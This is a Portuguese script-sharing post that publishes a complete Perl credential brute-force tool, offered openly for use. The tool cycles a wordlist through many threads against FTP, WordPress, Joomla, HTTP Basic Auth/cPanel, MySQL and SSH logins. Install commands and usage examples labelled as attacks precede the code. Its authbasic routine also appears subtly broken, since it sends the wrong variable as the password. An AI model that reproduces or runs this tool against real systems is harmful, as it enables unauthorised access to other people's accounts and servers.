Multi Brute Force
Publicado por Perfil removido (última atualização em 10/10/2013)
[ Hits: 9.600 ]
Esse script faz Brute Force em FTP, WordPress, Joomla!, Auth Basic, MySQL e SSH.
Para o script funcionar sem problemas, você precisa instalar a libssh e openssl, depois digitar no terminal:
# cpan YAML && cpan IO::Pty && cpan Net::OpenSSH && cpan WWW::Mechanize
#!/usr/bin/env perl # Coder: MMxM # Gr33tz 2: Cyclone , UT0P|4 , Md.morpheus , Hacker Fts315 , n4sss , MauzZz[BR] , chokao , c0de_universal use strict; use warnings; use threads; use Net::FTP; use DBI; use LWP; use Net::OpenSSH; use DBD::mysql; use Getopt::Long; use threads::shared; use WWW::Mechanize; use Term::ANSIColor qw(:constants); sub banner { print ' '.BRIGHT_GREEN.'[+]'.RESET.' Darkest Brute-force By MMxM v1.3 '.BOLD BLUE.'[*]'.RESET.' Options: -u | --user => name of user [example: admin] -h | --host => Target [example:] -w | --wordlist => Wordlist [example: /tmp/wordlist.txt] -t | --threads => number of threads [example: 10] -m | --module => module name [example: wordpress] '.BRIGHT_GREEN.'[+]'.RESET.' list of modules: '.BOLD BLUE.'[*]'.RESET.' ftp '.BOLD BLUE.'[*]'.RESET.' wordpress '.BOLD BLUE.'[*]'.RESET.' joomla '.BOLD BLUE.'[*]'.RESET.' authbasic -> used by cpanel and protected diretories (htaccess) '.BOLD BLUE.'[*]'.RESET.' mysql '.BOLD BLUE.'[*]'.RESET.' ssh '.BRIGHT_GREEN.'[+]'.RESET.' Examples of use: $ ./ -u admin -h -w wl.txt -t 50 -m ftp | FTP-ATTACK $ ./ -u admin -h localhost/wp-login.php -w wl.txt -t 100 -m wordpress | WP-ATTACK $ ./ -u admin -h localhost/administrator/ -w wl.txt -t 100 -m joomla | JOOMLA-ATTACK $ ./ -u admin -h localhost:2082 -w wl.txt -t 100 -m authbasic | CPANEL-ATTACK $ ./ -u admin -h localhost -w wl.txt -t 100 -m mysql | MYSQL-ATTACK $ ./ -u admin -h -w wl.txt -t 20 -m ssh | SSH-ATTACK '; exit(1); } my($wordlist,$thr,$ini,$fin,@threads,$arq,$i,@a,$test); our($user,$host,@aa,$type,$token); GetOptions( 'u|user=s' => \$user, 'h|host=s' => \$host, 'w|wordlist=s' => \$wordlist, 'm|module=s' => \$type, 't|threads=i' => \$thr ) || die &banner; if(defined($type)){ foreach('ftp','wordpress','joomla','authbasic','mysql','ssh'){ if($type eq $_){ $type = \&$type; $test = 1; last; } } if(!defined($test)){ &banner; } } else { &banner; } &banner if (!defined($user)) || (!defined($host)) || (!defined($wordlist)) || (!defined($thr)); open($arq,"<$wordlist") || die($!); @a = <$arq>; close($arq); @aa = grep { !/^$/ } @a; print "\n".BRIGHT_GREEN.'[+]'.RESET." Starting Attack"; print "\n".BRIGHT_GREEN.'[+]'.RESET." Host => $host"; print "\n".BRIGHT_GREEN.'[+]'.RESET." User => $user"; print "\n".BRIGHT_GREEN.'[+]'.RESET." Wordlist => $wordlist"; print "\n".BRIGHT_GREEN.'[+]'.RESET." Threads => $thr\n\n"; my $stop :shared = 0; $ini = 0; $fin = $thr - 1; while(1){ @threads = (); #die("\n\n".BRIGHT_GREEN."[+]".RESET." 100% complete\n\n") if $stop; for($i=$ini;$i<=$fin;$i++){ push(@threads,$i); } foreach(@threads){ $_ = threads->create(\&brute); } foreach(@threads){ $_->join(); } print("\n\n".BRIGHT_GREEN."[+]".RESET." 100% complete\n\n") if $stop; exit(0) if $stop; for($i=$ini;$i<=$fin;$i++){ #last if $stop; print BOLD RED.'[-]'.RESET." Trying => $aa[$i]";# if(defined($aa[$i])); } $ini = $fin + 1; $fin = $fin + $thr; } sub brute { my $id = threads->tid(); threads->exit() if $stop; $id--; if(defined($aa[$id])){ &$type($aa[$id]); } else { $stop = 1; } } sub ftp { my($pass) = @_; chomp($pass); my $f = Net::FTP->new($host) || die($!); if($f->login($user, $pass)){ $f->quit; print "\n\n\t".BRIGHT_GREEN.'[+]'.RESET." PASSWORD CRACKED: $pass\n"; $stop = 1; } else { $f->quit; return; } } sub mysql { my($pass) = @_; chomp($pass); my $dsn = "dbi:mysql::$host:3306"; my $DBIconnect = DBI->connect($dsn, $user, $pass,{ PrintError => 0, RaiseError => 0 }); if(!$DBIconnect){ return; } else { print "\n\n\t".BRIGHT_GREEN.'[+]'.RESET." PASSWORD CRACKED: $pass\n"; $stop = 1; } } sub authbasic { my($pass) = @_; chomp($pass); if($host !~ /^(http|https):\/\//){ $host = 'http://'.$host; } my $ua = LWP::UserAgent->new; my $req = HTTP::Request->new(GET => $host); $req->authorization_basic($user, $_); if($ua->request($req)->code == 401){ return; } else { print "\n\n\t".BRIGHT_GREEN.'[+]'.RESET." PASSWORD CRACKED: $pass\n"; $stop = 1; } } sub wordpress { my($pass) = @_; chomp($pass); my $ua = new LWP::UserAgent; if ($host !~ /^(http|https):\/\//){ $host = 'http://' . $host; } my $response = $ua->post($host,{ 'log' => $user, 'pwd' => $pass, 'wp-submit' => 'Log in', }); my $code = $response->code; if($code =~ /302/){ print "\n\n\t".BRIGHT_GREEN.'[+]'.RESET." PASSWORD CRACKED: $pass\n"; $stop = 1; } else { return; } } sub joomla { my($pass) = @_; chomp($pass); if ($host !~ /^(http|https):\/\//){ $host = 'http://' . $host; } my $mech = WWW::Mechanize->new(); $mech->get($host); if($mech->content() =~ /([0-9a-fA-F]{32})/){ $token = $1; } else { die("\n[-] Error to get security token\n"); } $mech->submit_form( fields => { username => $user, passwd => $pass, task => 'login', $token => '1', } ); if($mech->content() !~ /com_categories/i){ return; } else { print "\n\n\t".BRIGHT_GREEN.'[+]'.RESET." PASSWORD CRACKED: $pass\n"; $stop = 1; } } sub ssh { my($pass) = @_; chomp($pass); open(my $stderr_fh,'>>/dev/null') || die $!; open(my $stdout_fh,'>>/dev/null') || die $!; my %opts = ( user => $user, passwd => $pass, default_stderr_fh => $stderr_fh, default_stdout_fh => $stdout_fh, timeout => 20, ); my $ssh = Net::OpenSSH->new($host,%opts); if($ssh->error){ return; } else { print "\n\n\t".BRIGHT_GREEN.'[+]'.RESET." PASSWORD CRACKED: $pass\n"; $stop = 1; } }
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